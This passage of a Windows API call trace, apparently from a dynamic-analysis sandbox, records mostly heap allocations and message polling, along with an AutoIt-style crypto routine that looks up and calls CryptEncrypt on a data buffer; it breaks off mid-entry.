[0263.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x125f020 | out: hHeap=0x970000) returned 1 [0263.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0263.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0263.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0263.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0263.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0263.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0263.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0263.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0263.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1324e) returned 0x2f27268 [0263.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0263.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0263.297] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0263.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0263.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0263.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0263.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1324e) returned 0x2f14010 [0263.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0263.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0263.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0263.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0263.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0263.297] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0263.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0263.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0263.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0263.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0263.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0263.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0263.298] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0263.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0263.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0263.298] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0263.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0263.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0263.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0263.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0263.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0263.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0263.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0263.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1324e) returned 0x2f14010 [0263.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d48 [0263.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0263.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0263.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ee8 [0263.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0263.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0263.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0263.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0263.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0263.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0263.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0263.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0263.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1324e) returned 0x2f3a4c0 [0263.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0263.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0263.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0263.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0263.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0263.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0263.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0263.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0263.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0263.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0263.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0263.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0263.339] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.339] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.339] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.340] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0263.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0263.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0263.340] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.340] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0263.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0263.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0263.340] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0263.341] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0263.341] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.341] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0263.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0263.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0263.341] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0263.341] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0263.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0263.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0263.341] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.341] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.342] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.342] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0263.342] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.342] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0263.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.342] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0263.435] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0263.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51e38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0263.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0263.436] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0263.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0263.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54350 [0263.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0263.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0263.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0263.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0263.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0263.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0263.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0263.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0263.436] CryptEncrypt (in: hKey=0xa872d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1324e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x13250) returned 1 [0263.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0263.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0263.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0263.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0263.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0263.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0263.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0263.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0263.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0263.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0263.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0263.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0263.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0263.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0263.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0263.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0263.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0263.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0263.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0263.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0263.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0263.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0263.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0263.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0263.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0263.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0263.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0263.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0263.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0263.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0263.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0263.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0263.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0263.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0263.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0263.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0263.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0263.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0263.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0263.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0263.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0263.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0263.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0263.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0263.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0263.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0263.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0263.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0263.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0263.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0263.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0263.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0263.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0263.440] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0263.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0263.440] RtlAllocateHeap (HeapHandle=0x970000, 